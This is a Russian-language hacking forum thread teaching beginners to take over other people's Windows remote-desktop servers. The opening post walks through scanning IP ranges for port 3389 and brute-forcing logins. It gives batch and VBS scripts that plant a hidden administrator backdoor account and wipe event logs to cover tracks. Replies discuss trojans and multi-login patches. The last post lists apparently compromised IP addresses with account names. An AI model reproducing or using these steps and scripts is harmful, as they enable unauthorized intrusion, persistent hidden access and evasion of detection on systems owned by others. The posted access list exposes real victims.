Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Новичкам » Как добыть дедик(Удалённый рабочий стол)


Как добыть дедик(Удалённый рабочий стол)

Сообщений 1 страница 26 из 26

1

В статье будет описываться как добыть дедик(удалённый рабочий стол),как создать на нём учётную запись и не большие инструкции чего не стоит и наоборот делать чтоб дедик не спалили и не удалили учётную записи на нём.
Что такое Дедик:
Дедик проще говоря это - Удалённый рабочий стол,позволяющий работать удалённо.(так в общих чертах)

ВикипидиЯ написал(а):

RDP (англ. Remote Desktop Protocol — протокол удалённого рабочего стола) — протокол прикладного уровня, разработанный Microsoft, использующийся для обеспечения удалённой работы пользователя с сервером, на котором запущен сервис терминальных подключений. Клиенты существуют практически для всех версий Windows (включая Windows CE и Mobile), Linux, FreeBSD, Mac OS X, Android, Symbian. По умолчанию используется порт TCP 3389. Официальное название Майкрософт для клиентского ПО — Remote Desktop Connection или Terminal Services Client (TSC), в частности, клиент в Windows 2k/XP/2003/Vista/2008/7 называется mstsc.exe.
Особенности:
Поддержка 32-битного цвета (в дополнение к 8-, 15-, 16-, и 24-битному в предыдущих версиях);
128-битовое шифрование, используя алгоритм шифрования RC4 (значение безопасности по умолчанию; старые клиенты могут использовать более слабое шифрование). Но из-за уязвимости «man-in-the-middle vulnerability» в версиях ранее 6.0 во многих случаях трафик может быть расшифрован по пути;
Поддержка Transport Layer Security;
Звук с удалённого ПК переадресовывается и воспроизводится на локальном компьютере;
Позволяет подключать локальные ресурсы к удалённой машине (mapping);
Позволяет использовать локальный или сетевой принтеры на удалённом ПК;
Позволяет приложениям, выполняющимся в пределах текущего сеанса, обращаться к локальным последовательным и параллельным портам;
Можно обмениваться информацией через буфер обмена.
В Windows Server 2008 и Windows Vista используется новая версия протокола, RDP 6.
Так как RDP по умолчанию создаёт виртуальные консоли, то для подключения не к ним, а непосредственно к консоли 0 (основная консоль-мышь/клавиатура) нужно запустить RDP-клиент с параметром console.

Для чего он нужен:
Дедики используют для того чтоб не напрягать свой комп,допустим при бруте,ведь дедики включены месяцами без перерыва,а брут может занимать очень долгое время.
Так же может использоваться и при других процесса ёмких задачах,допустим при досс атаках,для распространения вирусов,для скрытие собственного IP адреса,вообщем много для чего.

Где взять Дедик:
В данный момент,довольно много разных ресурсов где можно взять деик бесплатно,или во все купить.
Но те дедики которые в свободном распространении,давным давно уже заюзаны и большая часть из них уже мертва,что по части купить,тоже самое ведь ни кто не знает скольким людям достался тот или иной дедик  :)
Так что лучше всего его сбрутить самим.
Для брута нам потребуется сканер портов и сам брут,который будет тупа подбирать пароли к ним.
К примеру возьмём VNC-Scaner GUI 1.2 (скачать) и DUBrute v2.0 RC2 (скачать)
И так запускаем VNC-Scaner GUI 1.2 и выбираем диапазон страны страны,в которой нам нужно заполучить дедик:
http://i.pixs.ru/storage/3/4/2/scaner1png_1188209_2174342.png
Нажимаем кнопку "Get dialp list":
http://i2.pixs.ru/storage/3/4/7/scan2png_7288081_2174347.png
И появляется список диапазонов выбранной страны,можете оставить весь список,а можете не много сократить его,тем самым ускорить процесс.
Тыкаем кнопку "Start scan"
http://i.pixs.ru/storage/3/5/8/scan3png_3174112_2174358.png
И процесс сканирование на наличие компов с открытым портом "3389" начинался.
http://i.pixs.ru/storage/3/6/3/scan4png_6396829_2174363.png

После сканирования все IP адреса с открытым "3389" портом сохранятся в VNC_bypauth.txt,останется только выбрать от туда список IP адресов(можете нажать сочетание клавиш ctrl+H и в поле что вставить "3389",а поле на что оставить пустым,после чего нажать кнопку заменить.Тем самым вы не много сократите себе работу очистки списка адресов).
Далее врубаем DUBrute v2.0 RC2 и нажимаем кнопку "Generation":
http://i.pixs.ru/storage/3/8/8/brut1png_6588403_2174388.png

Вылезет окошко,в котором указываем путь к списку ip адресов,списку логинов,к списку паролей и нажимаем кнопку "Make":
http://i.pixs.ru/storage/4/0/5/brut2png_8428840_2174405.png
http://i.pixs.ru/storage/4/0/8/brut3png_5416136_2174408.png
С генерируется source.txt,теперь жмякаем кнопку  "Config":
http://i2.pixs.ru/storage/4/2/3/brut4png_5801058_2174423.png
Создаём текстовые файлы good.txt(сюда будут записываться сбрученые дедики) и bad.txt(сюда будут записываться неудачные подключение и прочие,в общем ошибки),указываем к ним путь и нажимаем кнопку "ok" :
http://i2.pixs.ru/storage/4/3/5/brut5png_2910378_2174435.png
Далее:
http://i2.pixs.ru/storage/4/8/0/brut6png_7342969_2174480.png
И процесс брута начался....
После того как процесс брута закончится,в текстовом файле good.txt будут находится сбрученые деды,примерно вот такого вида 78.83.175.217@administrator;123456789
Где 78.83.175.217 это ip адрес,administrator логин,а 123456789 пароль.
Теперь можно конектится 
Лезем "Пуск > Все программы > Стандартные > Подключение к удаленному рабочему столу"
Далее:
http://i2.pixs.ru/storage/5/9/3/Rdpng_7416342_2174593.png
И попадаем на удалённый рабочий стол(дедик) где нужно указать логин и пароль для авторизации
После чего первым делом создаём свою учетную запись.

Создаём учётную запись
На удалённом рабочем столе лезем " Пуск > Все программы > Стандартные > Командная строка" и вводим туда следующие :

Код:
net user sys pass /add
net localgroup Administrators sys /add
net localgroup "Remote Desktop Users" sys /add
net accounts /maxpwage:unlimited

Не много расшифрую .
Строка "net user sys pass /add" добавляет нового пользователя с именем sys и паролем  pass.
строка "net localgroup Administrators sys /add" добавляет пользователя sys в группу Администраторы.
"net localgroup "Remote Desktop Users" sys /add" тоже добавляет в группу и даёт возможность конекта через удалённый рабочий стол.
"net accounts /maxpwage:unlimited" позволяет избежать истечения срока действия пароля (14 дней)
Если кавыряете русскоязычный дед,значить группы будут указываться на русском языке,чтоб просмотреть нужные группы,просто введите в командной строке net localgroup.

Прячем свою учётную запись
Далее нам надо скрыть учётку от посторонних глаз,чтоб её  не было видно среди других учётных записей,для этого лезем в реестр,опять "Пуск > Все программы > Стандартные > Выполнить"
Вводим туда regedit и открывается редактор реестра,лезем "HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINE > SOFTWARE > Microsoft Windows NT > CurrentVersion > Winlogon > SpecialAccounts > UserList"
И создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта который создавал в командной строке(в данном случае это sys,и присваиваем ему численное значение 0 ( по умолчанию оно и будет стоять).
Далее выходим и заходим под своей учетной записью которую создали,создаём текстовый файл(где угодно) и пишем туда :

Код:
attrib +a +s +r +h "C:\Documents and Settings\sys"

Сохраняем как 1.bat запускаем и удаляем.
Если будете создавать учётку с другим именем соответственно и sys везде в том числе и в батинки,смените на своё.
Если хотите немного автоматизировать весь процесс создание учётной записи,можете создать на своём компе батинок с вот таким содержанием:

Код:
echo Add an account "ЛОГИН" with a Password "ПАРОЛЬ" 
Set AdmGroupSID=S-1-5-32-544 
Set AdmGroup= 
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J 
Set AdmGroup=%AdmGroup:~0,-1% 
echo Adding to our account in "Administrators" group 
net user ЛОГИН ПАРОЛЬ /add 
net localgroup %AdmGroup% ЛОГИН /add 
Set RDPGroupSID=S-1-5-32-555 
Set RDPGroup= 
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J 
Set RDPGroup=%RDPGroup:~0,-1% 
echo Adding to our account in "Remote desktop users" group 
net localgroup "%RDPGroup%" ЛОГИН /add 
echo Remove password expiration 
net accounts /maxpwage:unlimited 
echo If the folder does not exist yet, create it 
mkdir "C:\Documents and Settings\ЛОГИН" 
echo And put on her attribute "system" 
attrib +s +a +r +h "C:\Documents and Settings\ЛОГИН" 
echo Hide the account from the Winlogon 
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ЛОГИН /t REG_DWORD /d 0 /f

естественно заменив слова ЛОГИН и ПАРОЛЬ на свои данные,сохранить с расширением bat и залить на любой Ф.О.(Файлообменник),допустим на slil.ru,а когда уже попали на дедик,скачать его с браузера и запустить,в принципе так и весь софт который понадобится на дедике,закачивается через браузер,или программы удалённого доступа,так же можно закачивать через FTP.
Так же можете использовать VBS скрипт:

Код:
  Set objNetwork = CreateObject("WScript.Network")
strComputer = objNetwork.ComputerName

Set colAccounts = GetObject("WinNT://" & strComputer & "")
Set objUser = colAccounts.Create("user", "Логин")
objUser.SetPassword "Пароль"
objUser.SetInfo

Set objGroup = GetObject("WinNT://" & strComputer & "/Администраторы,group")
Set objUser = GetObject("WinNT://" & strComputer & "/Логин,user")
objGroup.Add(objUser.ADsPath)

Const ADS_UF_DONT_EXPIRE_PASSWD = &h10000
UserFlags = objUser.Get("UserFlags")
objPasswordExpirationFlag = UserFlags OR ADS_UF_DONT_EXPIRE_PASSWD
objUser.Put "userFlags", objPasswordExpirationFlag
objUser.SetInfo

Так же заменить Логин и пароль на свои.
Теперь не большие правила которым следует придерживаться чтоб не спалить свою учётку.:
1) Ни когда ни чего не удаляйте,разумеется кроме тех файлов которые сами туда закачали.
2)Ни когда ни чего не оставляйте на рабочем столе,даже если работаете под своей учёткой.
3)Всегда прячьте свои файлы как можно глубже( например в папке system32 )

Чистим логи(следы прибывания)

Для того чтоб удалить следы своего прибывания лезем в меню пуск
"Пуск > Все программы > Выполнить"
Вводим eventvwr и клацаем кнопку ok
Далее переходим Безопасность и чтоб не кавырятся среди кучи логов идем в меню  Вид > Фильтр ,там в код события вставляем 683 или 682 и клачаем ok
Вот теперь ищем свои следы и удаляем их,или же можете автоматизировать весь процесс,опять же написав небольшой батинок и скачав на дедик ClearLogs 1.0 (скачать)
Сам батинок:

Код:
@echo off
ping -n 30 yandex.ru	
"clearlogs.exe" 
C:\clearlogs.exe -sys 
C:\clearlogs.exe -app 
C:\clearlogs.exe -sec 
del "C:\clearlogs.exe" >nul 
del "C:\1.bat" >nul

Кидаем сам ClearLogs 1.0 вместе с батинком в корень диска C:\ и перед выход запускаем.

Спасибо за внимание,всего доброго!

0

2

@echo off
ping -n 30 yandex.ru
"clearlogs.exe"
C:\clearlogs.exe -sys
C:\clearlogs.exe -app
C:\clearlogs.exe -sec
del "C:\clearlogs.exe" >nul
del "C:\1.bat" >nul

Здесь тоже sys меняем на свой логин?

0

3

naxal нет,это параметр самой утилиты clearlogs

0

4

Научился создавать дэдик.MOssWar спасибо за статью.

0

5

naxal рад за тебя  https://forumupload.ru/uploads/000f/db/02/1735-2.gif

0

6

Можно ли запускать свою учётку паралельно с хозяином ?

0

7

naxal можно,правда не на всех дедах разрешён множественных вход,что бы разрешить нужно патчить.

0

8

А есть ссылки где этому можно научиться? Если есть скиньте плиз.

0

9

naxal да там учиться ни чему и не нужно))
Тупа запустил exe и он всё сделает за тебя,чуть позже залью патч и дам ссылку.

0

10

naxal http://ge.tt/9fyJ4WB - патчи для разрешение на множественный или интерактивный вход,в архиве несколько патчей,на разные версии ос,лучше использовать под нужную ос.
Подробно описывать времени нету,да и думаю как пользоваться патчем все знают.

0

11

thank you

0

12

MOssWar А на 7 такая же RDC ?? просто у меня там нет такого, у меня при подключения требует comptuer: и User name:  https://forumupload.ru/uploads/000f/db/02/1714-2.gif

0

13

Ты можешь не указывать имени,только хост,а при подключение к хосту все равно придётся ввести логин и пароль.

0

14

а если я уже жертве ранее давал батник telnet'а, с содержащим с добавлением скрытого профиля, например логин hack и пасс hack,  я могу уже в готовую просто подключится через дедик ?? Авторизоваться через тот скрытый акк ?? или же мне нужно определенный порт ??  которые описан в вашей теме... заранее спасибо

Отредактировано solo (2012-02-04 19:49:34)

0

15

нет,rdp и telnet совершенно разные вещи и протокол,и порт,а так же группы пользователей используется разные.

0

16

Блин будет обидно если все пройдет на ура.. но все это испортит ФАЕРВОЛ !!! как это бывает обычно (( покупаешь Всякие крипоторы джойнеры чтоб пихнуть prorat но увы ФАЕР ВСЕ ПОРТИТ (( Надеюсь с дедиком такого не будет..

0

17

solo давай без кривых понтов.
Когда не чего сказать,лучше во все промолчать,дабы не оказаться лжецом.(с) хз не помню кто.

0

18

Ты о чем ??

0

19

Эй Алло !! Админушка о каких понтов ты говоришь ??

0

20

Дитя,иди как ты алёкай в другом месте.

-1

21

Ахаха кто это из нас еще дитя..

0

22

solo посмотри в зеркало и тайна твоего вопроса будет раскрыта.

0

23

Ты агресивный..

0

24

НЕ появились сбрученые дедики что делать?? https://forumupload.ru/uploads/000f/db/02/1750-2.gif

0

25

Aleksander
Скань другую страну и там уже смотри там выбор огромный.попробуй расширеть деапозон портов.

0

26

Aleksander

Халявные свеже сбручиные дедики.

24.106.212.190@default | Error checked
24.116.243.147@laptop | Success | Microsoft Windows Server 2003 | 2046 | Intel(R) Xeon(TM)| 2 | 2528/390 | Yes
24.123.32.87@guest | Error checked
24.123.95.254@guest | Success | Microsoft Windows Server 2003 | 3070 | Intel(R) Xeon(TM)| 2 | 3800/492 | Yes
24.153.241.38@aa | Success | | 4029 | | 4 | 1595/517 | Yes
24.161.122.71@guest | Error checked
24.172.197.18@guest | Error checked
24.173.10.187@igor | Error checked
24.178.12.135@user | Success | Microsoft Windows Server 2003 | 2047 | | 4 | 3680/530 | Yes
24.179.3.178@guest | Error checked
80.81.12.89@info; | Error checked
24.185.108.40@admin1; | Success | Microsoft Windows Server 2003 | 2039 | Intel(R) Pentium(R) 4| 2 | 4262/744 | Yes
24.185.108.83@laptop; | Success | Microsoft Windows Server 2003 | 4095 | Intel(R) Xeon(R) | 4 | 5419/753 | Yes
24.187.204.66@guest; | Error checked
24.187.206.106@remote; | Success | Microsoft Windows Server 2003 | 3919 | Intel(R) Xeon(TM) | 2 | 3761/693 | Yes
24.188.6.10@user; | Error checked
24.196.32.130@default; | Success | Microsoft Windows Server 2003 | 4094 | Intel(R) Xeon(R) | 2 | | Yes
24.199.5.50@support; | Error checked
24.199.16.166@main; | Success | | 4094 | | 4 | 1847/426 | Yes
24.172.147.178@temp; | Error checked
24.170.250.185@laptop; | Success | Microsoft Windows Server 2003 | 2046 | Intel(R) Xeon(R) | 2 | 4941/554 | Yes
24.189.249.60@laptop; | Success | Microsoft Windows Server 2003 | 1278 | Intel(R) Pentium(R) 4 | 2 | 5051/435 | Yes

Код:
Акаунты записаны по шаблону.
Ip@Login;Password | State | System Version | RAM | Processor | Kernels | Speed | Nat

0


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Новичкам » Как добыть дедик(Удалённый рабочий стол)